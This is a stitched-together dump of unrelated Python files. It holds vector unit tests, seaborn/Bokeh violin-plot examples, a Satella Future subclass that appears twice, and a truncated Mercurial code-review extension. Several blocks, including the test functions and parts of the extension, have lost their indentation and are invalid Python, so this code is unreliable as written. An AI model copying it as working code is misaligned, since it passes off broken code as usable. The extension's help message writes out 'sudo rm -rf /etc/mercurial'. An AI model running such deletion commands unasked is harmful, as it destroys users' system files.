    # null within the vector tolerance (test_bool asserts the same value
    # is falsy, i.e. null).
    v1 = Vector(23.56678, 56678.56778, 2.56677) * (1.0 / 14.5667)
    v2 = Vector(23.56678, 56678.56778, 2.56677) / 14.5667
    result = v2 - v1
    # Bug fix: `result` was computed but never checked.
    assert result.is_null
    assert Vector(0, 0, 0).is_null
@pytest.mark.skipif(not PY3, reason="__bool__ not supported")
def test_bool():
v = Vector()
assert bool(v) is False
v1 = Vector(23.56678, 56678.56778, 2.56677) * (1.0 / 14.5667)
v2 = Vector(23.56678, 56678.56778, 2.56677) / 14.5667
result = v2 - v1
assert bool(result) is False
# actual precision is abs_tol=1e-9
assert not Vector(1e-8, 0, 0).is_null
def test_magnitude():
v = Vector(3, 4, 5)
assert is_close(abs(v), 7.0710678118654755)
assert is_close(v.magnitude, 7.0710678118654755)
def test_magnitude_square():
v = Vector(3, 4, 5)
assert is_close(v.magnitude_square, 50)
def test_normalize():
v = Vector(2, 0, 0)
assert v.normalize() == (1, 0, 0)
def test_normalize_to_length():
v = Vector(2, 0, 0)
assert v.normalize(4) == (4, 0, 0)
def test_orthogonal_ccw():
v = Vector(3, 4)
assert v.orthogonal() == (-4, 3)
def test_orthogonal_cw():
v = Vector(3, 4)
assert v.orthogonal(False) == (4, -3)
def test_negative():
v = Vector(2, 3, 4)
assert -v == (-2, -3, -4)
def test_add_scalar():
v = Vector(2, 3, 4)
assert v + 3 == (5, 6, 7)
def test_iadd_scalar():
v = Vector(2, 3, 4)
v += 3
assert v == (5, 6, 7)
def test_sub_scalar():
v = Vector(2, 3, 4)
assert v - 3 == (-1, 0, 1)
def test_isub_scalar():
v = Vector(2, 3, 4)
v -= 3
assert v == (-1, 0, 1)
def test_add_vector():
v = Vector(2, 3, 4)
assert v + (7, 7, 7) == (9, 10, 11)
def test_iadd_vector():
v = Vector(2, 3, 4)
v += (7, 7, 7)
assert v == (9, 10, 11)
def test_radd_vector():
v = Vector(2, 3, 4)
assert (7, 7, 7) + v == (9, 10, 11)
def test_sub_vector():
v = Vector(2, 3, 4)
assert v - (7, 7, 7) == (-5, -4, -3)
def test_isub_vector():
v = Vector(2, 3, 4)
v -= (7, 7, 7)
assert v == (-5, -4, -3)
def test_rsub_vector():
v = Vector(2, 3, 4)
assert (7, 7, 7) - v == (5, 4, 3)
def test_mul_scalar():
v = Vector(2, 3, 4)
assert v * 2 == (4, 6, 8)
def test_imul_scalar():
v = Vector(2, 3, 4)
v *= 2
assert v == (4, 6, 8)
def test_rmul_scalar():
v = Vector(2, 3, 4)
assert 2 * v == (4, 6, 8)
def test_div_scalar():
v = Vector(2, 3, 4)
assert v / 2 == (1, 1.5, 2)
def test_idiv_scalar():
v = Vector(2, 3, 4)
v /= 2
assert v == (1, 1.5, 2)
def test_rdiv_scalar():
v = Vector(2, 3, 4)
assert 2 / v == (1, 0.66666666667, 0.5)
def test_dot_product():
v1 = Vector(2, 7, 1)
v2 = Vector(3, 9, 8)
assert is_close(v1.dot(v2), 77)
def test_angle_deg():
assert is_close(Vector(0, 1).angle_deg, 90)
assert is_close(Vector(0, -1).angle_deg, -90)
assert is_close(Vector(1, 1).angle_deg, 45)
assert is_close(Vector(-1, 1).angle_deg, 135)
def test_angle_between():
v1 = Vector(0, 1)
v2 = Vector(1, 1)
angle = v1.angle_between(v2)
assert is_close(angle, math.pi / 4)
# reverse order, same result
angle = v2.angle_between(v1)
assert is_close(angle, math.pi / 4)
def test_cross_product():
v1 = Vector(2, 7, 9)
v2 = Vector(3, 9, 1)
assert v1.cross(v2) == (-74, 25, -3)
def test_rot_z():
assert Vector(2, 2, 7).rot_z_deg(90) == (-2, 2, 7)
def test_lerp():
v1 = Vector(1, 1, 1)
v2 = Vector(4, 4, 4)
assert v1.lerp(v2, .5) == (2.5, 2.5, 2.5)
assert v1.lerp(v2, 0) == (1, 1, 1)
assert v1.lerp(v2, 1) == (4, 4, 4)
def test_replace():
v = Vector(1, 2, 3)
assert v.replace(x=7) == (7, 2, 3)
assert v.replace(y=7) == (1, 7, 3)
assert v.replace(z=7) == (1, 2, 7)
assert v.replace(x=7, z=7) == (7, 2, 7)
|
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns

from bokeh import mpl
from bokeh.plotting import show

# generate some random data
data = 1 + np.random.randn(20, 6)

# Use Seaborn and Matplotlib normally
# NOTE(review): positional-data violinplot with `color=` as a palette name is
# pre-0.6 seaborn API — confirm against the pinned seaborn version.
sns.violinplot(data, color="Set3")
plt.title("Seaborn violin plot in Bokeh")

# Convert to interactive Bokeh plot with one command
# NOTE(review): bokeh.mpl / to_bokeh was removed in later Bokeh releases.
show(mpl.to_bokeh(name="violin"))
# fix seaborn example in concepts section of userguide
import seaborn as sns

from bokeh import mpl
from bokeh.plotting import output_file, show

# Load the example "tips" dataset bundled with seaborn.
tips = sns.load_dataset("tips")

sns.set_style("whitegrid")

# Split violin plot of total bill per day, colored by sex.
ax = sns.violinplot(x="day", y="total_bill", hue="sex",
                    data=tips, palette="Set2", split=True,
                    scale="count", inner="stick")

output_file("violin.html")
# NOTE(review): converts the active matplotlib figure; bokeh.mpl.to_bokeh was
# removed in later Bokeh releases — confirm the pinned version.
show(mpl.to_bokeh())
|
import logging
from concurrent.futures import Future as PythonFuture
from concurrent.futures._base import CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, RUNNING, \
InvalidStateError
import concurrent.futures._base
LOGGER = logging.getLogger('concurrent.futures')

# Extra internal state: the result is set but pre-done callbacks may still
# rewrite it. Registered with concurrent.futures internals so that debug
# descriptions know about the extra state.
PRE_FINISHED = 'PRE-FINISHED'
concurrent.futures._base._STATE_TO_DESCRIPTION_MAP[PRE_FINISHED] = 'pre-finished'
concurrent.futures._base._FUTURE_STATES.append(PRE_FINISHED)
class Future(PythonFuture):
    """
    A future that allows it's callback handlers to change it's result before presenting
    it to the user.
    Use like this:
    >>> fut = Future()
    >>> fut.set_running_or_notify_cancel()
    >>> def transform_future(future):
    >>>     future.set_result(future.result() + 2)
    >>> fut.add_pre_done_callback(transform_future)
    >>> fut.set_result(2)
    >>> assert fut.result() == 4
    """
    def __init__(self):
        super().__init__()
        # Callables run while this future is PRE_FINISHED; they may replace
        # the result/exception before waiters are released.
        self._pre_done_callbacks = []

    def add_pre_done_callback(self, fn):
        """
        Attaches a callable that will be called just before the future finishes
        and can change the future's result (or insert an Exception).
        Args:
            fn: A callable that will be called with this future as its only
                argument just before the future completes or is cancelled.
        """
        with self._condition:
            if self._state not in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]:
                self._pre_done_callbacks.append(fn)
                return
        # Future already done/cancelled: invoke immediately, outside the lock.
        try:
            fn(self)
        except Exception:
            LOGGER.exception('exception calling callback for %r', self)

    def _invoke_pre_callbacks(self):
        # Run every pre-done callback; a failing callback is logged, never raised.
        for callback in self._pre_done_callbacks:
            try:
                callback(self)
            except Exception:
                LOGGER.exception('exception calling callback for %r', self)

    def result(self, timeout=None):
        # While PRE_FINISHED (i.e. called from inside a pre-done callback),
        # return the tentative result directly instead of waiting.
        if self._state == PRE_FINISHED:
            return self.__get_result()
        else:
            return super().result(timeout)

    def exception(self, timeout=None):
        # Bug fix: the parameter was declared as `timeout: None` (a required
        # positional with an annotation) instead of a default of None, so
        # fut.exception() raised TypeError.
        if self._state == PRE_FINISHED:
            return self._exception
        else:
            return super().exception(timeout)

    # NOTE(review): a pair of earlier duplicate set_result/set_exception
    # definitions was shadowed by the two below and has been removed.
    def set_result(self, result):
        """Sets the return value of work associated with the future.
        Should only be used by Executor implementations and unit tests.
        """
        if self._state == PRE_FINISHED:
            # Called from a pre-done callback: just swap the tentative result.
            self._result = result
        else:
            with self._condition:
                if self._state in {CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED}:
                    raise InvalidStateError('{}: {!r}'.format(self._state, self))
                self._result = result
                # Give pre-done callbacks a chance to rewrite the result
                # before waiters see FINISHED.
                self._state = PRE_FINISHED
                self._invoke_pre_callbacks()
                self._state = FINISHED
                for waiter in self._waiters:
                    waiter.add_result(self)
                self._condition.notify_all()
            self._invoke_callbacks()

    def set_exception(self, exception):
        """Sets the result of the future as being the given exception.
        Should only be used by Executor implementations and unit tests.
        """
        if self._state == PRE_FINISHED:
            # Called from a pre-done callback: replace the outcome.
            self._exception = exception
            self._result = None
        else:
            with self._condition:
                if self._state in {CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED}:
                    raise InvalidStateError('{}: {!r}'.format(self._state, self))
                self._exception = exception
                self._state = PRE_FINISHED
                self._invoke_pre_callbacks()
                self._state = FINISHED
                for waiter in self._waiters:
                    waiter.add_exception(self)
                self._condition.notify_all()
            self._invoke_callbacks()
class WrappingFuture(Future):
    """
    A Satella future wrapping an existing Python future.
    Use like:
    >> wrapped = WrappingFuture(existing_python_future)
    """
    def __init__(self, source_future: PythonFuture):
        super().__init__()
        self.source_future = source_future
        self.source_future.add_done_callback(self._on_future_completed)
        # Shadow state reported once the source future has FINISHED; until
        # then _state proxies the source future's state (see property below).
        self._old_state = source_future._state

    @property
    def _state(self):
        # Proxy the source future's state while it is still pending/running;
        # after it finishes, report the state recorded by our own
        # set_result/set_exception (e.g. PRE_FINISHED -> FINISHED).
        if self.source_future._state == FINISHED:
            return self._old_state
        else:
            return self.source_future._state

    @_state.setter
    def _state(self, v: str):
        self._old_state = v

    def set_running_or_notify_cancel(self) -> bool:
        # Delegate run/cancel arbitration to the wrapped future.
        return self.source_future.set_running_or_notify_cancel()

    def _on_future_completed(self, future: PythonFuture):
        # Propagate the source future's outcome into this wrapper, which also
        # fires our pre-done and done callbacks.
        if future._exception is not None:
            self.set_exception(future._exception)
        else:
            self.set_result(future._result)

    def cancel(self) -> bool:
        # NOTE(review): the wrapper's own cancel() result is discarded; the
        # source future's answer is treated as authoritative — confirm intended.
        super().cancel()
        return self.source_future.cancel()
# fix futures
import logging
from concurrent.futures import Future as PythonFuture
from concurrent.futures._base import CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED
import concurrent.futures._base
# InvalidStateError exists only on newer Pythons; provide a stub for older
# interpreters so `raise InvalidStateError(...)` below keeps working.
try:
    from concurrent.futures import InvalidStateError
except ImportError:
    class InvalidStateError(Exception):
        pass

LOGGER = logging.getLogger('concurrent.futures')

# Extra internal state: the result is set but pre-done callbacks may still
# rewrite it. Registered with concurrent.futures internals so that debug
# descriptions know about the extra state.
PRE_FINISHED = 'PRE-FINISHED'
concurrent.futures._base._STATE_TO_DESCRIPTION_MAP[PRE_FINISHED] = 'pre-finished'
concurrent.futures._base._FUTURE_STATES.append(PRE_FINISHED)
class Future(PythonFuture):
    """
    A future that allows it's callback handlers to change it's result before presenting
    it to the user.
    Use like this:
    >>> fut = Future()
    >>> fut.set_running_or_notify_cancel()
    >>> def transform_future(future):
    >>>     future.set_result(future.result() + 2)
    >>> fut.add_pre_done_callback(transform_future)
    >>> fut.set_result(2)
    >>> assert fut.result() == 4
    """
    def __init__(self):
        super().__init__()
        # Callables run while this future is PRE_FINISHED; they may replace
        # the result/exception before waiters are released.
        self._pre_done_callbacks = []

    def add_pre_done_callback(self, fn):
        """
        Attaches a callable that will be called just before the future finishes
        and can change the future's result (or insert an Exception).
        Args:
            fn: A callable that will be called with this future as its only
                argument just before the future completes or is cancelled.
        """
        with self._condition:
            if self._state not in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]:
                self._pre_done_callbacks.append(fn)
                return
        # Future already done/cancelled: invoke immediately, outside the lock.
        try:
            fn(self)
        except Exception:
            LOGGER.exception('exception calling callback for %r', self)

    def _invoke_pre_callbacks(self):
        # Run every pre-done callback; a failing callback is logged, never raised.
        for callback in self._pre_done_callbacks:
            try:
                callback(self)
            except Exception:
                LOGGER.exception('exception calling callback for %r', self)

    def result(self, timeout=None):
        # While PRE_FINISHED (i.e. called from inside a pre-done callback),
        # return the tentative result directly instead of waiting.
        if self._state == PRE_FINISHED:
            return self.__get_result()
        else:
            return super().result(timeout)

    def exception(self, timeout=None):
        # Bug fix: the parameter was declared as `timeout: None` (a required
        # positional with an annotation) instead of a default of None, so
        # fut.exception() raised TypeError.
        if self._state == PRE_FINISHED:
            return self._exception
        else:
            return super().exception(timeout)

    # NOTE(review): a pair of earlier duplicate set_result/set_exception
    # definitions was shadowed by the two below and has been removed.
    def set_result(self, result):
        """Sets the return value of work associated with the future.
        Should only be used by Executor implementations and unit tests.
        """
        if self._state == PRE_FINISHED:
            # Called from a pre-done callback: just swap the tentative result.
            self._result = result
        else:
            with self._condition:
                if self._state in {CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED}:
                    raise InvalidStateError('{}: {!r}'.format(self._state, self))
                self._result = result
                # Give pre-done callbacks a chance to rewrite the result
                # before waiters see FINISHED.
                self._state = PRE_FINISHED
                self._invoke_pre_callbacks()
                self._state = FINISHED
                for waiter in self._waiters:
                    waiter.add_result(self)
                self._condition.notify_all()
            self._invoke_callbacks()

    def set_exception(self, exception):
        """Sets the result of the future as being the given exception.
        Should only be used by Executor implementations and unit tests.
        """
        if self._state == PRE_FINISHED:
            # Called from a pre-done callback: replace the outcome.
            self._exception = exception
            self._result = None
        else:
            with self._condition:
                if self._state in {CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED}:
                    raise InvalidStateError('{}: {!r}'.format(self._state, self))
                self._exception = exception
                self._state = PRE_FINISHED
                self._invoke_pre_callbacks()
                self._state = FINISHED
                for waiter in self._waiters:
                    waiter.add_exception(self)
                self._condition.notify_all()
            self._invoke_callbacks()
class WrappingFuture(Future):
    """
    A Satella future wrapping an existing Python future.
    Use like:
    >> wrapped = WrappingFuture(existing_python_future)
    """
    def __init__(self, source_future: PythonFuture):
        super().__init__()
        self.source_future = source_future
        self.source_future.add_done_callback(self._on_future_completed)
        # Shadow state reported once the source future has FINISHED; until
        # then _state proxies the source future's state (see property below).
        self._old_state = source_future._state

    @property
    def _state(self):
        # Proxy the source future's state while it is still pending/running;
        # after it finishes, report the state recorded by our own
        # set_result/set_exception (e.g. PRE_FINISHED -> FINISHED).
        if self.source_future._state == FINISHED:
            return self._old_state
        else:
            return self.source_future._state

    @_state.setter
    def _state(self, v: str):
        self._old_state = v

    def set_running_or_notify_cancel(self) -> bool:
        # Delegate run/cancel arbitration to the wrapped future.
        return self.source_future.set_running_or_notify_cancel()

    def _on_future_completed(self, future: PythonFuture):
        # Propagate the source future's outcome into this wrapper, which also
        # fires our pre-done and done callbacks.
        if future._exception is not None:
            self.set_exception(future._exception)
        else:
            self.set_result(future._result)

    def cancel(self) -> bool:
        # NOTE(review): the wrapper's own cancel() result is discarded; the
        # source future's answer is treated as authoritative — confirm intended.
        super().cancel()
        return self.source_future.cancel()
|
#!/usr/bin/env python
#
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
from mercurial import cmdutil, commands, hg, util, error, match
from mercurial.node import nullrev, hex, nullid, short
import os, re
import stat
import subprocess
import threading
from HTMLParser import HTMLParser
from xml.etree import ElementTree as ET
try:
hgversion = util.version()
except:
from mercurial.version import version as v
hgversion = v.get_version()
oldMessage = """
The code review extension requires Mercurial 1.3 or newer.
To install a new Mercurial,
sudo easy_install mercurial
works on most systems.
"""
linuxMessage = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""
# Refuse to load under pre-1.3 Mercurial; a plain string compare is adequate
# for the 1.x version strings this extension targets.
if hgversion < '1.3':
    msg = oldMessage
    if os.access("/etc/mercurial", 0):
        msg += linuxMessage
    raise util.Abort(msg)
# To experiment with Mercurial in the python interpreter:
# >>> repo = hg.repository(ui.ui(), path = ".")
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
import sys
if __name__ == "__main__":
print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
sys.exit(2)
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
class CL(object):
    """One change list: description, file list, reviewers and server state.

    Persisted locally as .hg/codereview/cl.<name>; most metadata also lives
    on the Rietveld server. `name` is "new" until the server assigns an
    issue number.
    """
    def __init__(self, name):
        self.name = name
        self.desc = ''
        self.files = []
        self.reviewer = []
        self.cc = []
        self.url = ''
        self.local = False  # a cl.<name> file exists in this repository
        self.web = False    # metadata has been loaded from / synced to the server
        self.original_author = None # None means current user

    def DiskText(self):
        """Render the on-disk representation (author, description, file list)."""
        cl = self
        s = ""
        if cl.original_author:
            s += "Author: " + cl.original_author + "\n\n"
        s += "Description:\n"
        s += Indent(cl.desc, "\t")
        s += "Files:\n"
        for f in cl.files:
            s += "\t" + f + "\n"
        return s

    def EditorText(self):
        """Render the editable form shown to the user (parsed back by ParseCL)."""
        cl = self
        s = _change_prolog
        s += "\n"
        if cl.original_author:
            s += "Author: " + cl.original_author + "\n"
        if cl.url != '':
            s += 'URL: ' + cl.url + ' # cannot edit\n\n'
        s += "Reviewer: " + JoinComma(cl.reviewer) + "\n"
        s += "CC: " + JoinComma(cl.cc) + "\n"
        s += "\n"
        s += "Description:\n"
        if cl.desc == '':
            s += "\t<enter description here>\n"
        else:
            s += Indent(cl.desc, "\t")
        s += "\n"
        if cl.local or cl.name == "new":
            s += "Files:\n"
            for f in cl.files:
                s += "\t" + f + "\n"
            s += "\n"
        return s

    def PendingText(self):
        """Render the summary used by the pending-changes listing."""
        cl = self
        s = cl.name + ":" + "\n"
        s += Indent(cl.desc, "\t")
        s += "\n"
        if cl.original_author:
            s += "\tAuthor: " + cl.original_author + "\n"
        s += "\tReviewer: " + JoinComma(cl.reviewer) + "\n"
        s += "\tCC: " + JoinComma(cl.cc) + "\n"
        s += "\tFiles:\n"
        for f in cl.files:
            s += "\t\t" + f + "\n"
        return s

    def Flush(self, ui, repo):
        """Write the CL to disk (atomically) and sync metadata to the server."""
        if self.name == "new":
            self.Upload(ui, repo, gofmt_just_warn=True)
        dir = CodeReviewDir(ui, repo)
        path = dir + '/cl.' + self.name
        # Write to a temporary name, then rename, so readers never see a
        # partially written file.
        f = open(path+'!', "w")
        f.write(self.DiskText())
        f.close()
        os.rename(path+'!', path)
        if self.web and not self.original_author:
            EditDesc(self.name, desc=self.desc,
                reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc))

    def Delete(self, ui, repo):
        """Remove the CL's on-disk file."""
        dir = CodeReviewDir(ui, repo)
        os.unlink(dir + "/cl." + self.name)

    def Subject(self):
        """Build the e-mail subject: truncated first line of the description."""
        s = line1(self.desc)
        if len(s) > 60:
            s = s[0:55] + "..."
        if self.name != "new":
            s = "code review %s: %s" % (self.name, s)
        return s

    def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False):
        """Upload the CL's diff and metadata to the Rietveld server.

        On success, adopts the server-assigned issue number as this CL's
        name, records the issue URL, and flushes the CL back to disk.
        """
        if ui.configbool("codereview", "force_gofmt", True) and gofmt:
            CheckGofmt(ui, repo, self.files, just_warn=gofmt_just_warn)
        os.chdir(repo.root)
        form_fields = [
            ("content_upload", "1"),
            ("reviewers", JoinComma(self.reviewer)),
            ("cc", JoinComma(self.cc)),
            ("description", self.desc),
            ("base_hashes", ""),
            # Would prefer not to change the subject
            # on reupload, but /upload requires it.
            ("subject", self.Subject()),
        ]
        # NOTE(rsc): This duplicates too much of RealMain,
        # but RealMain doesn't have the most reusable interface.
        if self.name != "new":
            form_fields.append(("issue", self.name))
        vcs = GuessVCS(upload_options)
        data = vcs.GenerateDiff(self.files)
        files = vcs.GetBaseFiles(data)
        # Oversized diffs are uploaded patch-by-patch after issue creation.
        if len(data) > MAX_UPLOAD_SIZE:
            uploaded_diff_file = []
            form_fields.append(("separate_patches", "1"))
        else:
            uploaded_diff_file = [("data", "data.diff", data)]
        ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
        response_body = MySend("/upload", body, content_type=ctype)
        patchset = None
        msg = response_body
        lines = msg.splitlines()
        if len(lines) >= 2:
            msg = lines[0]
            patchset = lines[1].strip()
            patches = [x.split(" ", 1) for x in lines[2:]]
        ui.status(msg + "\n")
        if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
            raise util.Abort("failed to update issue: " + response_body)
        issue = msg[msg.rfind("/")+1:]
        self.name = issue
        if not self.url:
            self.url = server_url_base + self.name
        if not uploaded_diff_file:
            patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
        vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
        if send_mail:
            MySend("/" + issue + "/mail", payload="")
        self.web = True
        self.Flush(ui, repo)
        return
def GoodCLName(name):
    """Return a truthy match object when `name` is a pure decimal CL number."""
    digits_only = re.compile(r"^[0-9]+$")
    return digits_only.match(name)
def ParseCL(text, name):
    """Parse the editor/disk representation of a change list.

    Returns (cl, 0, '') on success, or (None, lineno, error) where lineno
    is the 1-based offending line.
    """
    sname = None
    lineno = 0
    sections = {
        'Author': '',
        'Description': '',
        'Files': '',
        'URL': '',
        'Reviewer': '',
        'CC': '',
    }
    for line in text.split('\n'):
        lineno += 1
        line = line.rstrip()
        # Full-line comments are ignored.
        if line != '' and line[0] == '#':
            continue
        # Blank or indented lines continue the current section.
        if line == '' or line[0] == ' ' or line[0] == '\t':
            if sname is None and line != '':
                return None, lineno, 'text outside section'
            if sname is not None:
                sections[sname] += line + '\n'
            continue
        # Otherwise the line must open a known "Name: [value]" section.
        p = line.find(':')
        if p >= 0:
            s, val = line[:p].strip(), line[p+1:].strip()
            if s in sections:
                sname = s
                if val != '':
                    sections[sname] += val + '\n'
                continue
        return None, lineno, 'malformed section header'
    for k in sections:
        sections[k] = StripCommon(sections[k]).rstrip()
    cl = CL(name)
    if sections['Author']:
        cl.original_author = sections['Author']
    cl.desc = sections['Description']
    for line in sections['Files'].split('\n'):
        # Strip trailing per-file comments.
        i = line.find('#')
        if i >= 0:
            line = line[0:i].rstrip()
        if line == '':
            continue
        cl.files.append(line)
    cl.reviewer = SplitCommaSpace(sections['Reviewer'])
    cl.cc = SplitCommaSpace(sections['CC'])
    cl.url = sections['URL']
    # The editor placeholder means "no description was entered".
    if cl.desc == '<enter description here>':
        cl.desc = ''
    return cl, 0, ''
def SplitCommaSpace(s):
    """Split a comma- and/or whitespace-separated string into tokens."""
    normalized = s.replace(",", " ")
    return normalized.split()
def CutDomain(s):
    """Return the local part of an email address (everything before '@').

    If there is no '@', s is returned unchanged.
    """
    return s.partition('@')[0]
def JoinComma(l):
    """Join a list of strings with ", " separators."""
    separator = ", "
    return separator.join(l)
def ExceptionDetail():
    """Format the currently handled exception as 'TypeName: message'."""
    s = str(sys.exc_info()[0])
    # str() of an exception type looks like "<type 'X'>" (old-style) or
    # "<class 'X'>"; unwrap it to just the type name.
    if s.startswith("<type '") and s.endswith("'>"):
        s = s[7:-2]
    elif s.startswith("<class '") and s.endswith("'>"):
        s = s[8:-2]
    detail = str(sys.exc_info()[1])
    if len(detail) > 0:
        s += ": " + detail
    return s
# Report whether name is a valid CL number with a local cl.<name> file
# in the repository's codereview directory.
def IsLocalCL(ui, repo, name):
    return GoodCLName(name) and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
# Returns (cl, err); err is '' on success.
def LoadCL(ui, repo, name, web=True):
    if not GoodCLName(name):
        return None, "invalid CL name"
    dir = CodeReviewDir(ui, repo)
    path = dir + "cl." + name
    if os.access(path, 0):
        ff = open(path)
        text = ff.read()
        ff.close()
        cl, lineno, err = ParseCL(text, name)
        if err != "":
            return None, "malformed CL data: "+err
        cl.local = True
    else:
        cl = CL(name)
    if web:
        # Refresh reviewer, CC, and description from the code review server.
        try:
            f = GetSettings(name)
        except:
            return None, "cannot load CL %s from code review server: %s" % (name, ExceptionDetail())
        if 'reviewers' not in f:
            return None, "malformed response loading CL data from code review server"
        cl.reviewer = SplitCommaSpace(f['reviewers'])
        cl.cc = SplitCommaSpace(f['cc'])
        cl.desc = f['description']
        cl.url = server_url_base + name
        cl.web = True
    return cl, ''
# Worker thread that loads one CL, so LoadAllCL can fetch many in parallel.
class LoadCLThread(threading.Thread):
    def __init__(self, ui, repo, dir, f, web):
        threading.Thread.__init__(self)
        self.ui = ui
        self.repo = repo
        self.dir = dir
        self.f = f      # file name of the form "cl.<number>"
        self.web = web
        self.cl = None  # result; set by run() on success
    def run(self):
        # f[3:] strips the "cl." prefix to recover the CL number.
        cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
        if err != '':
            self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
            return
        self.cl = cl
# Load all the CLs from this repository.
# Returns a dict mapping CL name -> CL object.
def LoadAllCL(ui, repo, web=True):
    dir = CodeReviewDir(ui, repo)
    m = {}
    files = [f for f in os.listdir(dir) if f.startswith('cl.')]
    if not files:
        return m
    active = []
    first = True
    for f in files:
        t = LoadCLThread(ui, repo, dir, f, web)
        t.start()
        if web and first:
            # first request: wait in case it needs to authenticate
            # otherwise we get lots of user/password prompts
            # running in parallel.
            t.join()
            if t.cl:
                m[t.cl.name] = t.cl
            first = False
        else:
            active.append(t)
    # Collect the results of the remaining parallel loads.
    for t in active:
        t.join()
        if t.cl:
            m[t.cl.name] = t.cl
    return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
    """Return the local file-system path of the repository root, or None."""
    url = repo.url()
    if not url.startswith('file:/'):
        ui.warn("repository %s is not in local file system\n" % (url,))
        return None
    # Drop the "file:" scheme prefix and any trailing slash.
    path = url[5:]
    if path.endswith('/'):
        path = path[:-1]
    return path
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
    dir = RepoDir(ui, repo)
    if dir == None:
        return None
    dir += '/.hg/codereview/'
    if not os.path.isdir(dir):
        try:
            # 0700 is a Python 2 octal literal: owner-only permissions.
            os.mkdir(dir, 0700)
        except:
            ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
            return None
    return dir
# Strip maximal common leading white space prefix from text
def StripCommon(text):
    """Remove the longest whitespace prefix shared by all non-blank lines.

    Blank lines are ignored when computing the prefix, leading blank
    lines are dropped, and trailing blank lines collapse to one newline.
    If text has no non-blank lines it is returned unchanged.
    """
    lines = [line.rstrip() for line in text.split('\n')]
    # Whitespace prefix of each non-blank line.
    prefixes = [line[:len(line) - len(line.lstrip())] for line in lines if line != '']
    if not prefixes:
        return text
    ws = os.path.commonprefix(prefixes)
    out = ''
    for line in lines:
        if line.startswith(ws):
            line = line[len(ws):]
        if line == '' and out == '':
            continue  # drop leading blank lines
        out += line + '\n'
    # Collapse any run of trailing blank lines into a single newline.
    while out.endswith('\n\n'):
        out = out[:-1]
    return out
# Indent text with indent.
def Indent(text, indent):
    """Prefix every line of text (split on '\\n') with indent."""
    return ''.join(indent + line + '\n' for line in text.split('\n'))
# Return the first line of l
def line1(text):
    """Return text up to, but not including, the first newline."""
    return text.partition('\n')[0]
# Prologue written at the top of the CL editing buffer shown to the user.
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
#######################################################################
# Mercurial helper functions

# Return list of changed files in repository that match pats.
def ChangedFiles(ui, repo, pats, opts):
    """Return the sorted list of modified, added, and removed files matching pats."""
    matcher = cmdutil.match(repo, pats, opts)
    node1, node2 = cmdutil.revpair(repo, None)
    modified, added, removed = repo.status(node1, node2, matcher)[:3]
    return sorted(modified + added + removed)
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
    """Return the sorted list of modified and added (still-present) files matching pats."""
    matcher = cmdutil.match(repo, pats, opts)
    node1, node2 = cmdutil.revpair(repo, None)
    modified, added, _ = repo.status(node1, node2, matcher)[:3]
    return sorted(modified + added)
# Return list of files claimed by existing CLs
# NOTE: relies on Python 2 dict.keys() returning a list.
def TakenFiles(ui, repo):
    return Taken(ui, repo).keys()
def Taken(ui, repo):
    """Map each file claimed by a local CL to the CL object that claims it."""
    taken = {}
    for cl in LoadAllCL(ui, repo, web=False).values():
        for f in cl.files:
            taken[f] = cl
    return taken
# Return list of changed files that are not claimed by other CLs
# (i.e. the files a new CL would get by default).
def DefaultFiles(ui, repo, pats, opts):
    return Sub(ChangedFiles(ui, repo, pats, opts), TakenFiles(ui, repo))
def Sub(l1, l2):
    """Return the elements of l1 that are not in l2, preserving order."""
    kept = []
    for item in l1:
        if item not in l2:
            kept.append(item)
    return kept
def Add(l1, l2):
    """Return the sorted union of lists l1 and l2."""
    # Inline the Sub helper: append only l2 elements not already in l1.
    merged = l1 + [item for item in l2 if item not in l1]
    merged.sort()
    return merged
def Intersect(l1, l2):
    """Return the elements of l1 that also appear in l2 (order from l1)."""
    both = []
    for item in l1:
